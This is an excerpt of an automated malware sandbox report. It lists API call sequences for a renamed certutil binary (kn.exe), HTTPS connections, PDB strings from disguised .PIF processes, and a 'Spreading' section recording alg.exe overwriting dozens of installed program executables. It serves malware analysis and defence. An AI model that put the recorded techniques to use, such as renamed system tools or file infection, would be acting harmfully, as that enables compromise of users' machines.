                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13D8488 #357,CertGetCertificateChain,GetLastError,LocalAlloc,CertGetCRLContextProperty,GetLastError,GetLastError,GetLastError,CryptAcquireContextW,GetLastError,memset,CryptMsgOpenToEncode,GetLastError,CryptMsgUpdate,GetLastError,#357,#357,CryptReleaseContext,CryptMsgClose,CertCloseStore,CertFreeCertificateChain,LocalFree,LocalFree,LocalFree,9_2_00007FF7F13D8488
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13BA450 #357,#358,#357,#223,SetLastError,SetLastError,memmove,memmove,#357,#357,GetLastError,#357,#357,strcmp,GetLastError,strcmp,strcmp,strcmp,qsort,#357,CompareFileTime,CompareFileTime,#357,#357,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertCloseStore,CertCloseStore,CertFreeCTLContext,LocalFree,free,9_2_00007FF7F13BA450
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13BC450 CertOpenStore,GetLastError,#357,CryptQueryObject,CertAddStoreToCollection,GetLastError,#357,CertAddStoreToCollection,GetLastError,CertOpenStore,GetLastError,CertAddStoreToCollection,GetLastError,CertCloseStore,CertCloseStore,CertCloseStore,CertCloseStore,9_2_00007FF7F13BC450
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13544E0 #357,#256,#357,GetLastError,CryptImportPublicKeyInfoEx2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalAlloc,GetLastError,memmove,BCryptVerifySignature,BCryptVerifySignature,BCryptDestroyKey,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF7F13544E0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F140E516 ??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,NCryptIsKeyHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,9_2_00007FF7F140E516
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F136C514 CryptGetProvParam,SetLastError,LocalAlloc,LocalFree,9_2_00007FF7F136C514
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13B24D4 #357,CertCompareCertificateName,CertCompareCertificateName,GetSystemTime,SystemTimeToFileTime,GetLastError,#357,CompareFileTime,CompareFileTime,CompareFileTime,CompareFileTime,CryptVerifyCertificateSignature,GetLastError,#357,strcmp,strcmp,#357,#357,#357,CertCompareCertificateName,#357,CertCompareCertificateName,#357,CertFreeCTLContext,9_2_00007FF7F13B24D4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13D2358 #357,#357,CryptReleaseContext,CryptReleaseContext,CertFreeCertificateContext,CertFreeCertificateContext,9_2_00007FF7F13D2358
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13D6374 memset,#358,#357,LocalFree,LocalFree,#357,#357,_strlwr,#357,LocalFree,LocalFree,lstrcmpW,#359,#359,#357,CryptAcquireContextW,GetLastError,#256,CryptGenRandom,GetLastError,#254,#357,fopen,fopen,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,LocalAlloc,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,#357,LocalFree,#357,fprintf,fprintf,CertOpenStore,GetLastError,LocalAlloc,CertSaveStore,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,fclose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,CryptReleaseContext,fprintf,fprintf,fflush,ferror,9_2_00007FF7F13D6374
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13823E8 BCryptResolveProviders,#360,#360,BCryptFreeBuffer,9_2_00007FF7F13823E8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1418404 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,9_2_00007FF7F1418404
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1364410 GetUserDefaultUILanguage,GetSystemDefaultUILanguage,#357,#357,CryptFindOIDInfo,CryptEnumOIDInfo,#360,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,CryptEnumOIDInfo,#258,#358,#357,#357,#357,LocalFree,#224,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF7F1364410
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F136E3B0 #357,#357,CryptDecodeObject,LocalFree,9_2_00007FF7F136E3B0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13B4694 CertFindAttribute,CryptHashCertificate2,memcmp,#357,9_2_00007FF7F13B4694
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1376694 CryptQueryObject,GetLastError,#359,#357,#357,LocalFree,CertCloseStore,CryptMsgClose,9_2_00007FF7F1376694
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1370630 #357,CryptDecodeObject,GetLastError,#357,GetLastError,GetLastError,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF7F1370630
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1416654 NCryptGetProperty,#360,9_2_00007FF7F1416654
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13AA654 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyTimeValidity,CertOpenStore,GetLastError,#357,CryptVerifyCertificateSignature,CertVerifyRevocation,GetLastError,#357,CertCloseStore,9_2_00007FF7F13AA654
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13826E0 #357,#357,LocalAlloc,memmove,memset,#357,BCryptFreeBuffer,#357,#357,#357,9_2_00007FF7F13826E0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14166D8 NCryptFreeObject,#360,9_2_00007FF7F14166D8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14086D8 CertFindCertificateInStore,CryptAcquireCertificatePrivateKey,GetLastError,#359,CertFindCertificateInStore,GetLastError,#359,#357,CertFreeCertificateContext,9_2_00007FF7F14086D8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F144A58C NCryptOpenStorageProvider,NCryptOpenKey,NCryptGetProperty,GetProcessHeap,HeapAlloc,NCryptGetProperty,NCryptFreeObject,NCryptFreeObject,9_2_00007FF7F144A58C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F141A590 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,9_2_00007FF7F141A590
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13DE57C CertOpenStore,GetLastError,#357,CertAddEncodedCertificateToStore,GetLastError,#358,CryptFindCertificateKeyProvInfo,GetLastError,#358,#357,CertSetCTLContextProperty,GetLastError,CryptAcquireCertificatePrivateKey,GetLastError,CertSetCTLContextProperty,GetLastError,LocalFree,CertFreeCertificateContext,CertCloseStore,9_2_00007FF7F13DE57C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13A25E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,9_2_00007FF7F13A25E8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1368600 #357,CryptDecodeObject,GetLastError,LocalFree,9_2_00007FF7F1368600
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E65B4 NCryptIsKeyHandle,_CxxThrowException,9_2_00007FF7F13E65B4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F136C5D4 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#357,#357,#357,#357,LocalFree,LocalFree,9_2_00007FF7F136C5D4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1366824 CryptHashCertificate,GetLastError,#357,9_2_00007FF7F1366824
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E0844 BCryptExportKey,#205,#359,#357,#357,9_2_00007FF7F13E0844
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E08EC BCryptGetProperty,#205,#359,#357,#357,9_2_00007FF7F13E08EC
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1414914 GetLastError,#359,CryptGetUserKey,CryptGetUserKey,GetLastError,#357,CryptDestroyKey,CryptReleaseContext,9_2_00007FF7F1414914
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CE914 CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,GetLastError,GetLastError,GetLastError,#357,CryptDestroyHash,9_2_00007FF7F13CE914
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F144E8B0 CryptDecodeObjectEx,GetLastError,CryptBinaryToStringW,GetLastError,memset,CryptBinaryToStringW,??3@YAXPEAX@Z,LocalFree,9_2_00007FF7F144E8B0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F135A8CC CryptFindLocalizedName,CertEnumCertificatesInStore,CertFindCertificateInStore,CertGetCRLContextProperty,#357,#357,#357,CertEnumCertificatesInStore,9_2_00007FF7F135A8CC
                    Source: unknown HTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.7:49700 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.7:49892 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.7:49996 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.7:50000 version: TLS 1.2
                    Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: AppVClient.pdbGCTL source: Native_neworigin.exe, 00000020.00000003.1761821664.0000000002F20000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: Native_neworigin.exe, 00000020.00000003.1827211609.0000000005BD0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: ALG.pdbGCTL source: Native_neworigin.exe, 00000020.00000003.1680189794.0000000005130000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 00000022.00000003.2652969004.0000000001460000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: AppVClient.pdb source: Native_neworigin.exe, 00000020.00000003.1761821664.0000000002F20000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: Native_neworigin.exe, 00000020.00000003.1827211609.0000000005BD0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: easinvoker.pdb source: AnyDesk.PIF, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1293644753.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1680776952.0000000002366000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1294144317.000000007F920000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1731970165.0000000020BCB000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1731970165.0000000020BFB000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1691758562.0000000002ECE000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: _.pdb source: Native_neworigin.exe, 00000020.00000003.1680680146.000000000089E000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1948863536.0000000005180000.00000004.08000000.00040000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1941635606.0000000003FBE000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1916978924.0000000002AE6000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000000.1261759874.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1265745168.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000002.1288228586.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000000.1281568871.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000010.00000000.1290049580.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000010.00000002.1291210071.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000011.00000000.1291943838.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000011.00000002.1293263855.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, esentutl.exe, 00000017.00000003.1644060715.0000000005660000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000019.00000002.1650975079.0000000000421000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001A.00000000.1654122990.0000000000421000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001D.00000002.1778308832.0000000000421000.00000020.00000001.01000000.0000000A.sdmp
                    Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000018.00000003.1647730402.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 0000001E.00000000.1658726741.0000000000591000.00000020.00000001.01000000.0000000B.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000022.00000003.2553259791.0000000001490000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000022.00000003.2192790900.0000000001540000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: certutil.pdb source: kn.exe, 00000009.00000002.1279659774.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1266250734.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000E.00000000.1282363010.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000E.00000002.1287164671.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp
                    Source: Binary string: easinvoker.pdbH source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000022.00000003.2192790900.0000000001540000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 00000022.00000003.2652969004.0000000001460000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: ALG.pdb source: Native_neworigin.exe, 00000020.00000003.1680189794.0000000005130000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: cmd.pdb source: alpha.exe, 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000000.1261759874.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1265745168.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000002.1288228586.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000000.1281568871.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000010.00000000.1290049580.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000010.00000002.1291210071.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000011.00000000.1291943838.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000011.00000002.1293263855.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, esentutl.exe, 00000017.00000003.1644060715.0000000005660000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000019.00000002.1650975079.0000000000421000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001A.00000000.1654122990.0000000000421000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001D.00000002.1778308832.0000000000421000.00000020.00000001.01000000.0000000A.sdmp
                    Source: Binary string: easinvoker.pdbGCTL source: AnyDesk.PIF, 0000000F.00000003.1293644753.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1647644472.000000002215E000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1680776952.0000000002366000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1294144317.000000007F920000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1731970165.0000000020BCB000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1647644472.000000002212D000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1682798891.0000000002912000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1731970165.0000000020BFB000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1293907494.000000000291C000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1691758562.0000000002ECE000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000022.00000003.2553259791.0000000001490000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: ping.pdb source: esentutl.exe, 00000018.00000003.1647730402.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 0000001E.00000000.1658726741.0000000000591000.00000020.00000001.01000000.0000000B.sdmp
                    Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000009.00000002.1279659774.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1266250734.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000E.00000000.1282363010.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000E.00000002.1287164671.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp

                    Spreading

                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7z.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\AppVClient.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zG.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\FXSSVC.exe
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
